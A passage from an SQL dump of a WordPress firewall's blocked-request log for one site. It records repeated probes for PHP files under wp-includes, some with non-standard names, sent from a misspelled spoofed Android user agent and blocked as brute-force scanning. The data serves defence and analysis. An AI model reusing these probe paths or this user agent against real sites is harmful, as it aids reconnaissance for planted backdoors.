User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1wb3NpdGlvbi1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133841,1699931082.929333,1699931082.920400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-packages.min.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXBhY2thZ2VzLm1pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133842,1699931071.879151,1699931071.869900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133843,1699931227.371975,1699931227.362600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/background.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JhY2tncm91bmQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133894,1699931630.977220,1699931630.967900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-code-editor-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY29kZS1lZGl0b3ItY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133844,1699931219.083617,1699931219.074800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/align.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2FsaWduLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133845,1699931215.891113,1699931215.868800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133846,1699931201.745415,1699931201.736000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/social-links-shared-background-color.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3NvY2lhbC1saW5rcy1zaGFyZWQtYmFja2dyb3VuZC1jb2xvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133893,1699931635.336316,1699931635.327600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-color-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY29sb3ItY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133847,1699931197.090627,1699931197.081400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-standard-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LXN0YW5kYXJkLXBvc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134025,1699932613.841368,1699932613.832600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/php72compat_const.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL3BocDcyY29tcGF0X2NvbnN0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133962,1699932204.617011,1699932204.594800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWFwcGxpY2F0aW9uLXBhc3N3b3Jkcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133848,1699931190.008305,1699931189.999400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-small-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LXNtYWxsLXBvc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133849,1699931183.280860,1699931183.258800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-offset-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW9mZnNldC1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133892,1699931638.665485,1699931638.656800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-cropped-image-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY3JvcHBlZC1pbWFnZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133850,1699931168.193132,1699931168.183800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-medium-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW1lZGl1bS1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133851,1699931162.185561,1699931162.176200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-large-title-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LWxhcmdlLXRpdGxlLXBvc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133852,1699931156.240550,1699931156.226400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-grid-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LWdyaWQtcG9zdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133891,1699931646.005984,1699931645.997200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-custom-css-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtY3VzdG9tLWNzcy1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133853,1699931145.611591,1699931145.590200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133854,1699931119.907857,1699931119.898900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133855,1699931112.551308,1699931112.537600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-react-refresh-runtime.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXJlYWN0LXJlZnJlc2gtcnVudGltZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134104,1699994956.220979,1699994956.199300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133963,1699932189.818480,1699932189.804700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-server.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3Qtc2VydmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133890,1699931651.892212,1699931651.883500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-date-time-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtZGF0ZS10aW1lLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133856,1699931105.576374,1699931105.560500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-react-refresh-runtime.min.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 